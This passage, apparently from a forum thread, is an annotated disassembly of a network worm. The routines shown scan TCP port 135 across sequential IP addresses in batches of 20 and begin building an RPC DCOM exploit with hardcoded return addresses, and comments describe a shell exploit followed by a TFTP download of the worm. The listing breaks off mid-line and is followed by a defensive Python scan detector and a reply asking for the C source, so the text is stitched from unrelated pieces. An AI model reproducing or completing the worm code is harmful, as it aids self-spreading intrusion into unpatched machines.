.text:00401695 lea eax, [ebp+to]
.text:0040169B push eax ; to
.text:0040169C push 0 ; flags
.text:0040169E push edi ; len
.text:0040169F lea eax, [ebp+var_204]
.text:004016A5 push eax ; buf
.text:004016A6 push ds:s ; s
.text:004016AC call sendto
.text:004016B1 cmp eax, 1
.text:004016B4 jl short loc_4016D8
.text:004016B6 push 384h ; dwMilliseconds
.text:004016BB call Sleep ; sleep for 0.9 seconds
.text:004016C0 cmp edi, 204h
.text:004016C6 jnb short loc_4016D3
.text:004016C8 push esi
.text:004016C9 call fclose
.text:004016CE pop ecx
.text:004016CF xor esi, esi
.text:004016D1 jmp short loc_4016D8
.text:004016D3 ; ---------------------------------------------------------------------------
.text:004016D3
.text:004016D3 loc_4016D3: ; CODE XREF: TFTPServerThread+150^j
.text:004016D3 jmp loc_40164C
.text:004016D8 ; ---------------------------------------------------------------------------
.text:004016D8
.text:004016D8 loc_4016D8: ; CODE XREF: TFTPServerThread+13E^j
.text:004016D8 ; TFTPServerThread+15B^j
.text:004016D8 or esi, esi
.text:004016DA jz short loc_4016EA
.text:004016DC push esi
.text:004016DD call fclose
.text:004016E2 pop ecx
.text:004016E3 jmp short loc_4016EA
.text:004016E5 ; ---------------------------------------------------------------------------
.text:004016E5 jmp loc_40158C
.text:004016EA ; ---------------------------------------------------------------------------
.text:004016EA
.text:004016EA loc_4016EA: ; CODE XREF: TFTPServerThread+29^j
.text:004016EA ; TFTPServerThread+78^j ...
.text:004016EA and dwTFTPInProgress, 0
.text:004016F1 push ds:s ; s
.text:004016F7 call closesocket
.text:004016FC push 0 ; dwExitCode
.text:004016FE call ExitThread
.text:00401703 xor eax, eax
.text:00401705 pop edi
.text:00401706 pop esi
.text:00401707 pop ebx
.text:00401708 leave
.text:00401709 retn 4
.text:00401709 TFTPServerThread endp
.text:00401709
.text:0040170C
.text:0040170C ; =============== S U B R O U T I N E =======================================
.text:0040170C
.text:0040170C
.text:0040170C incrementOctets proc near ; CODE XREF: incrementOctets+68vj
.text:0040170C ; infect20Hosts+6Fvp
.text:0040170C cmp ds:octet4, 0FEh
.text:00401716 jle short loc_401727 ; increment 4th octet and stop if in range [0-254]
.text:00401718 and ds:octet4, 0 ; 4th octet rolls over to 0; increment 3rd octet
.text:0040171F inc ds:octet3
.text:00401725 jmp short loc_40172F ; stop if octet3 is now in range [0-254]
.text:00401727 ; ---------------------------------------------------------------------------
.text:00401727
.text:00401727 loc_401727: ; CODE XREF: incrementOctets+A^j
.text:00401727 inc ds:octet4 ; increment 4th octet and stop if in range [0-254]
.text:0040172D jmp short locret_401776 ; return
.text:0040172F ; ---------------------------------------------------------------------------
.text:0040172F
.text:0040172F loc_40172F: ; CODE XREF: incrementOctets+19^j
.text:0040172F cmp ds:octet3, 0FEh ; stop if octet3 is now in range [0-254]
.text:00401739 jle short locret_401776 ; return
.text:0040173B and ds:octet3, 0 ; 3rd octet rolls over to 0; increment 2nd octet
.text:00401742 inc ds:octet2
.text:00401748 cmp ds:octet2, 0FEh ; stop if octet2 is now in range [0-254]
.text:00401752 jle short locret_401776 ; return
.text:00401754 and ds:octet2, 0 ; 2nd octet rolls over to 0; increment 1st octet
.text:0040175B inc ds:octet1
.text:00401761 cmp ds:octet1, 0FEh ; keep 1st octet if now in range [0-254];
.text:0040176B jle short loc_401774 ; increment 4th octet again so addr is never x.0.0.0
.text:0040176D and ds:octet1, 0 ; otherwise, 1st octet rolls over to 0
.text:00401774
.text:00401774 loc_401774: ; CODE XREF: incrementOctets+5F^j
.text:00401774 jmp short incrementOctets ; increment 4th octet again so addr is never x.0.0.0
.text:00401776 ; ---------------------------------------------------------------------------
.text:00401776
.text:00401776 locret_401776: ; CODE XREF: incrementOctets+21^j
.text:00401776 ; incrementOctets+2D^j ...
.text:00401776 retn ; return
.text:00401776 incrementOctets endp
.text:00401776
.text:00401777
.text:00401777 ; =============== S U B R O U T I N E =======================================
.text:00401777
.text:00401777 ; Attributes: bp-based frame
.text:00401777
.text:00401777 infect20Hosts proc near ; CODE XREF: WinMain+312^p
.text:00401777
.text:00401777 var_18C = dword ptr -18Ch
.text:00401777 writefds = fd_set ptr -188h
.text:00401777 var_84 = byte ptr -84h
.text:00401777 in = in_addr ptr -80h
.text:00401777 namelen = dword ptr -74h
.text:00401777 argp = dword ptr -70h
.text:00401777 name = sockaddr ptr -6Ch
.text:00401777 timeout = timeval ptr -5Ch
.text:00401777 var_54 = dword ptr -54h
.text:00401777 s = dword ptr -50h
.text:00401777
.text:00401777 push ebp
.text:00401778 mov ebp, esp
.text:0040177A sub esp, 18Ch
.text:00401780 push ebx
.text:00401781 push esi
.text:00401782 push edi
.text:00401783 mov [ebp+argp], 1 ; set argp for ioctlsocket() to 1 (on)
.text:0040178A push 10h
.text:0040178C push 0
.text:0040178E lea eax, [ebp+name]
.text:00401791 push eax
.text:00401792 call memset
.text:00401797 add esp, 0Ch
.text:0040179A mov [ebp+name.sa_family], 2 ; AF_INET
.text:004017A0 push 87h ; hostshort = port TCP/135
.text:004017A5 call htons
.text:004017AA mov esi, eax
.text:004017AC mov word ptr [ebp+name.sa_data], si
.text:004017B0 xor edi, edi
.text:004017B2
.text:004017B2 Create 20 non-blocking TCP/IP sockets
.text:004017B2
.text:004017B2 loc_4017B2: ; CODE XREF: infect20Hosts+6Bvj
.text:004017B2 push 0 ; protocol = IPPROTO_IP
.text:004017B4 push 1 ; type = SOCK_STREAM
.text:004017B6 push 2 ; af = AF_INET
.text:004017B8 call socket
.text:004017BD mov [ebp+edi*4+s], eax
.text:004017C1 cmp [ebp+edi*4+s], 0FFFFFFFFh
.text:004017C6 jz loc_401924 ; return
.text:004017CC lea eax, [ebp+argp]
.text:004017CF push eax ; argp = 1 (on)
.text:004017D0 push 8004667Eh ; cmd = FIONBIO
.text:004017D5 push [ebp+edi*4+s] ; s[EDI]
.text:004017D9 call ioctlsocket
.text:004017DE inc edi
.text:004017DF cmp edi, 14h
.text:004017E2 jl short loc_4017B2 ; loop 20 times
.text:004017E4 xor edi, edi
.text:004017E6
.text:004017E6 Try to connect sockets to port TCP/135 on 20 sequential IP addresses
.text:004017E6
.text:004017E6 loc_4017E6: ; CODE XREF: infect20Hosts+CDvj
.text:004017E6 call incrementOctets ; connect loop -- executed 20 times
.text:004017EB push ds:octet4
.text:004017F1 push ds:octet3
.text:004017F7 push ds:octet2
.text:004017FD push ds:octet1
.text:00401803 push offset aI_I_I_I ; "%i.%i.%i.%i"
.text:00401808 push offset cp
.text:0040180D call sprintf ; convert four octets into a string
.text:00401812 add esp, 18h
.text:00401815 push offset cp ; cp
.text:0040181A call inet_addr ; now convert string into DWORD
.text:0040181F mov [ebp+var_54], eax
.text:00401822 cmp eax, 0FFFFFFFFh
.text:00401825 jz loc_401924 ; return
.text:0040182B mov eax, [ebp+var_54]
.text:0040182E mov dword ptr [ebp+name.sa_data+2], eax
.text:00401831 push 10h ; namelen
.text:00401833 lea eax, [ebp+name]
.text:00401836 push eax ; name
.text:00401837 push [ebp+edi*4+s] ; s[EDI]
.text:0040183B call connect
.text:00401840 inc edi
.text:00401841 cmp edi, 14h
.text:00401844 jl short loc_4017E6 ; connect loop -- executed 20 times
.text:00401846 push 708h ; dwMilliseconds
.text:0040184B call Sleep ; wait 1.8 seconds
.text:00401850 xor edi, edi
.text:00401852
.text:00401852 Look for connected sockets by doing a select() on each s[EDI] (EDI=0..19)
.text:00401852
.text:00401852 loc_401852: ; CODE XREF: infect20Hosts+1A7vj
.text:00401852 and [ebp+timeout.tv_sec], 0
.text:00401856 and [ebp+timeout.tv_usec], 0 ; zero out timeval struct
.text:00401856 ; (timeout of 0 = return instantly)
.text:0040185A and [ebp+writefds.fd_count], 0 ; FD_ZERO(&writefds)
.text:00401861
.text:00401861 --- start of FD_SET macro code
.text:00401861
.text:00401861 and [ebp+var_18C], 0 ; FD_SET(s[EDI], &writefds)
.text:00401868 jmp short loc_401883
.text:0040186A ; ---------------------------------------------------------------------------
.text:0040186A
.text:0040186A loc_40186A: ; CODE XREF: infect20Hosts+118vj
.text:0040186A mov esi, [ebp+var_18C]
.text:00401870 mov ebx, [ebp+edi*4+s] ; EDI = index into s[] socket array
.text:00401870 ; EBX = socket s[EDI]
.text:00401874 cmp [ebp+esi*4+writefds.fd_array], ebx
.text:0040187B jz short loc_401891
.text:0040187D inc [ebp+var_18C]
.text:00401883
.text:00401883 loc_401883: ; CODE XREF: infect20Hosts+F1^j
.text:00401883 mov eax, [ebp+writefds.fd_count]
.text:00401889 cmp [ebp+var_18C], eax
.text:0040188F jb short loc_40186A
.text:00401891
.text:00401891 loc_401891: ; CODE XREF: infect20Hosts+104^j
.text:00401891 mov eax, [ebp+writefds.fd_count]
.text:00401897 cmp [ebp+var_18C], eax
.text:0040189D jnz short loc_4018BB
.text:0040189F cmp eax, 40h
.text:004018A2 jnb short loc_4018BB
.text:004018A4 mov esi, [ebp+var_18C]
.text:004018AA mov ebx, [ebp+edi*4+s]
.text:004018AE mov [ebp+esi*4+writefds.fd_array], ebx
.text:004018B5 inc [ebp+writefds.fd_count]
.text:004018B5
.text:004018B5 --- end of FD_SET macro code
.text:004018BB
.text:004018BB loc_4018BB: ; CODE XREF: infect20Hosts+126^j
.text:004018BB ; infect20Hosts+12B^j
.text:004018BB lea eax, [ebp+timeout]
.text:004018BE push eax ; timeout
.text:004018BF push 0 ; exceptfds
.text:004018C1 lea eax, [ebp+writefds]
.text:004018C7 push eax ; writefds
.text:004018C8 push 0 ; readfds
.text:004018CA push 0 ; nfds
.text:004018CC call select ; writefds will be list of connected sockets
.text:004018D1 cmp eax, 1
.text:004018D4 jge short loc_4018E1 ; did select() succeed?
.text:004018D6 push [ebp+edi*4+s] ; s
.text:004018DA call closesocket ; close socket s[EDI] if select() failed
.text:004018DF jmp short loc_40191A ; advance to next iteration of loop
.text:004018E1 ; ---------------------------------------------------------------------------
.text:004018E1
.text:004018E1 loc_4018E1: ; CODE XREF: infect20Hosts+15D^j
.text:004018E1 mov [ebp+namelen], 10h
.text:004018E8 lea eax, [ebp+namelen]
.text:004018EB push eax ; namelen
.text:004018EC lea eax, [ebp+var_84]
.text:004018F2 push eax ; name
.text:004018F3 push [ebp+edi*4+s] ; s
.text:004018F7 call getpeername
.text:004018FC push dword ptr [ebp+in.S_un] ; in
.text:004018FF call inet_ntoa
.text:00401904 push eax ; szIPAddr: string representation of IP address to infect
.text:00401905 push [ebp+edi*4+s] ; s: socket connected to remote TCP/135
.text:00401909 call infectTarget ; infect a single host by sending command
.text:00401909 ; shell exploit and issuing command to
.text:00401909 ; download worm executable via TFTP
.text:0040190E add esp, 8
.text:00401911 push [ebp+edi*4+s] ; s
.text:00401915 call closesocket ; close TCP/135 socket
.text:0040191A
.text:0040191A loc_40191A: ; CODE XREF: infect20Hosts+168^j
.text:0040191A inc edi
.text:0040191B cmp edi, 14h
.text:0040191E jl loc_401852 ; check each of the 20 sockets in array for connection
.text:00401924
.text:00401924 loc_401924: ; CODE XREF: infect20Hosts+4F^j
.text:00401924 ; infect20Hosts+AE^j
.text:00401924 pop edi ; return
.text:00401925 pop esi
.text:00401926 pop ebx
.text:00401927 leave
.text:00401928 retn
.text:00401928 infect20Hosts endp
.text:00401928
.text:00401929
.text:00401929 ; =============== S U B R O U T I N E =======================================
.text:00401929
.text:00401929 ; Attributes: bp-based frame
.text:00401929
.text:00401929 ; int __cdecl infectTarget(SOCKET s,char *szIPAddr)
.text:00401929 infectTarget proc near ; CODE XREF: infect20Hosts+192^p
.text:00401929
.text:00401929 ThreadId = dword ptr -1934h
.text:00401929 var_1930 = dword ptr -1930h
.text:00401929 namelen = dword ptr -192Ch
.text:00401929 var_1928 = byte ptr -1928h
.text:00401929 var_18F8 = byte ptr -18F8h
.text:00401929 var_18BC = byte ptr -18BCh
.text:00401929 buf = byte ptr -155Ch
.text:00401929 var_1514 = dword ptr -1514h
.text:00401929 argp = dword ptr -1510h
.text:00401929 var_150C = byte ptr -150Ch
.text:00401929 var_14E8 = byte ptr -14E8h
.text:00401929 hObject = dword ptr -1240h
.text:00401929 var_123C = dword ptr -123Ch
.text:00401929 name = sockaddr ptr -1238h
.text:00401929 var_1228 = byte ptr -1228h
.text:00401929 var_1224 = byte ptr -1224h
.text:00401929 var_1223 = byte ptr -1223h
.text:00401929 var_1222 = byte ptr -1222h
.text:00401929 var_1221 = byte ptr -1221h
.text:00401929 var_1218 = dword ptr -1218h
.text:00401929 var_1210 = dword ptr -1210h
.text:00401929 var_1208 = dword ptr -1208h
.text:00401929 var_1204 = byte ptr -1204h
.text:00401929 len = dword ptr -1004h
.text:00401929 var_1000 = byte ptr -1000h
.text:00401929 var_FF8 = dword ptr -0FF8h
.text:00401929 var_FF0 = dword ptr -0FF0h
.text:00401929 var_F80 = dword ptr -0F80h
.text:00401929 var_F7C = dword ptr -0F7Ch
.text:00401929 var_F4C = dword ptr -0F4Ch
.text:00401929 var_F48 = dword ptr -0F48h
.text:00401929 var_F30 = dword ptr -0F30h
.text:00401929 var_E74 = dword ptr -0E74h
.text:00401929 s = dword ptr 8
.text:00401929 szIPAddr = dword ptr 0Ch
.text:00401929
.text:00401929 push ebp ; flags
.text:0040192A mov ebp, esp
.text:0040192C mov eax, 2934h
.text:00401931 call allocstackspace ; used when > 4KB stack space needed
.text:00401936 push ebx ; len
.text:00401937 push esi ; buf
.text:00401938 push edi ; s
.text:00401939 and [ebp+argp], 0 ; set argp for ioctlsocket() to 0 (off)
.text:00401940 lea eax, [ebp+argp]
.text:00401946 push eax ; argp = 0 (off)
.text:00401947 push 8004667Eh ; cmd = FIONBIO
.text:0040194C push [ebp+s] ; s
.text:0040194F call ioctlsocket ; make sure socket does blocking I/O
.text:00401954 cmp ds:dwWhichRetAddr, 1 ; 80% chance set to 1 (XP), 20% set to 2 (2000)
.text:0040195B jnz short loc_401969 ; 2000 "universal" return address (20% probability)
.text:0040195B ; 0018759Fh is a "CALL EBX" in unicode.nls
.text:0040195D
.text:0040195D Assemble RPC DCOM exploit packets
.text:0040195D
.text:0040195D mov [ebp+var_1514], 100139Dh ; XP "universal" return address (80% probability)
.text:0040195D ; 0100139Dh is a "CALL EBX" in svchost.exe
.text:00401967 jmp short loc_401973
.text:00401969 ; ---------------------------------------------------------------------------
.text:00401969
.text:00401969 loc_401969: ; CODE XREF: infectTarget+32^j
.text:00401969 mov [ebp+var_1514], 18759Fh ; 2000 "universal" return address (20% probability)
.text:00401969 ; 0018759Fh is a "CALL EBX" in unicode.nls
.text:00401973
.text:00401973 loc_401973: ; CODE XREF: infectTarget+3E^j
.text:00401973 lea edi, [ebp+buf]
.text:00401979 lea esi, ds:4040C0h ; bindstr[]
.text:0040197F mov ecx, 12h ; size = 0048h (72)
.text:00401984 rep movsd
.text:00401986 lea edi, [ebp+var_18BC]
.text:0040198C lea esi, ds:404108h ; request1[]
.t
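The incrementOctets() address walk and the 20-address TCP/135 probe pattern from infect20Hosts() above, modelled in Python as an added example (not the worm's code and not anything posted in this thread) so the address order can be reproduced for analysis and matched in connection logs; the log line format and the sample values are constructed.

```python
# Added example for this analysis, not the worm's or the thread's code: a port of
# incrementOctets() and a detector for the infect20Hosts() scan pattern. Log lines
# and their "<ts> <src> <dst> <dport> ..." format are constructed.
from collections import defaultdict

def increment_octets(o1, o2, o3, o4):
    """Bump the 4th octet while <= 254, else roll it to 0 and carry into the 3rd,
    2nd and 1st octets; a carry into the 1st re-enters the routine (the final jmp),
    so the result is x.0.0.1, never x.0.0.0. Note that .255 addresses are produced."""
    if o4 <= 254:
        return o1, o2, o3, o4 + 1
    o4, o3 = 0, o3 + 1
    if o3 <= 254:
        return o1, o2, o3, o4
    o3, o2 = 0, o2 + 1
    if o2 <= 254:
        return o1, o2, o3, o4
    o2, o1 = 0, o1 + 1
    if o1 > 254:
        o1 = 0
    return increment_octets(o1, o2, o3, o4)

def scan_sequence(start, count=20):
    """The `count` addresses one infect20Hosts() pass tries after `start`."""
    out, octs = [], start
    for _ in range(count):
        octs = increment_octets(*octs)
        out.append("%i.%i.%i.%i" % octs)
    return out

def detect_sequential_135_scan(lines, min_run=10, window=2.0):
    """{src: run} for sources whose TCP/135 attempts walk addresses in worm order
    (each dst is increment_octets() of the previous one) with gaps <= window s."""
    by_src = defaultdict(list)
    for line in lines:
        ts, src, dst, dport = line.split()[:4]
        if dport == "135":
            by_src[src].append((float(ts), dst))
    hits = {}
    for src, events in by_src.items():
        events.sort()
        run = best = 1
        for (t0, a), (t1, b) in zip(events, events[1:]):
            nxt = "%i.%i.%i.%i" % increment_octets(*map(int, a.split(".")))
            run = run + 1 if (b == nxt and t1 - t0 <= window) else 1
            best = max(best, run)
        if best >= min_run:
            hits[src] = best
    return hits

# Constructed sample: 10.0.0.5 walks 20 addresses in worm order across the
# 192.168.1.255 -> 192.168.2.0 rollover; 10.0.0.9 makes two unrelated connections.
SAMPLE_LOG = ["%.2f 10.0.0.5 %s 135 SYN" % (1 + 0.05 * i, d)
              for i, d in enumerate(scan_sequence((192, 168, 1, 244)))]
SAMPLE_LOG += ["3.00 10.0.0.9 192.168.1.10 135 SYN", "4.00 10.0.0.9 192.168.7.2 135 SYN"]
```

The run threshold is deliberately below 20 because a single pass may be split across log files or partly filtered, and the walk order, not the count, is the distinctive feature.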
TECHgenius
Asm code, eh? Does anyone have the C source?